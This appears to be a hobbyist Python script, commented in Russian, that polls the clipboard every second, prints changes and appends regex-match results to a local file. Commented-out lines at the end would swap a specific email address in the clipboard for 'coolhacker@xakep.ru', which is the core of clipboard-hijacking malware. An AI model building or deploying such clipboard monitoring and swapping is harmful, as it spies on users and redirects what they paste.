# Подключим модуль для работы с буфером обмена
import pyperclip
import re
# Подключим модуль для работы с системным временем
import time
# Задаем переменную old и присваиваем ей пустую строку
old = ''
ser = 'pluzhnikov_ss@tcla.ru'
pattern = "^[A-Za-z0-9_-]*$"

# Начнем бесконечный цикл слежения за буфером обмена
while True:
    # Кладем в переменную s содержимое буфера обмена
    s = pyperclip.paste()
    # Если полученное содержимое не равно предыдущему, то:
    if(s != old):
        # печатаем его
        print(s)
        stabe = str (re.match(pattern, s))
        f = open('byfer.txt', '+a', encoding='UTF-8')
        f.write(stabe)
        # в переменную old записываем текущее пойманное значение
        # чтобы в следующий виток цикла не повторяться и не печатать то, что уже поймано
    old = s
    # В конце витка цикла делаем паузу в одну секунду, чтобы содержимое буфера обмена успело прогрузиться
    time.sleep(1)
#    if not pyperclip.paste() != ser :
        
#       pyperclip.copy('coolhacker@xakep.ru')

